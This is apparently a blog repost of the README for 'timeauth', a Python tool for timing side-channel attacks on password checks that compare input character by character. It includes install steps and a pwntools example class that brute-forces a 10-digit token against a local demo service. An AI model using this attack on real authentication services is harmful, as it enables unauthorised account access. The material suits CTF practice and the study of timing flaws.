timeauth: Python Time Based Authentication Attack Tool

by do son · Published · Updated

timeauth

Time Authentication Attack Tool

Python Time Based Authentication Attack Tool

Installation

git clone git@github.com:SakiiR/timeauth.git
[…]
> pip install ./timeauth/

Usage

Suppose that we have a listening tcp service on localhost:1337 waiting for password input. What if the code behind this TCP service has been done by a weird developer and checks your input char by char and sleeping each time it checks your char ( or do a BIG action on his server that takes some time ).

> nc localhost 1337

Hello !

password please: SakiiR

Bad Password ! BYE BYE

[!] Closed connection ..

And the following backend password verification:

This package has been made to make exploitation of this kind of service faster by implementing a Single Class.

exemple:

from pwn import remote, context

from timeauth import TimeAuthChecker





class ExampleChecker(TimeAuthChecker):



    def __init__(self):

        super(self.__class__, self).__init__(

            charset="0123456789",

            token_length=10,

            hidden_char="*"

        )



    def request(self):



        context.log_level = 'error'

        s = remote('localhost', 1337)

        s.recvuntil(':')

        s.sendline(self.get_token())

        s.readall()

        s.close()

        context.log_level = 'info'



if __name__ == "__main__":

    a = ExampleChecker()

    a.process()

    a.print_token()

Demo

asciicast

Copyright (c) 2017 SakiiR

Source: https://github.com/SakiiR/

Tags: timeauth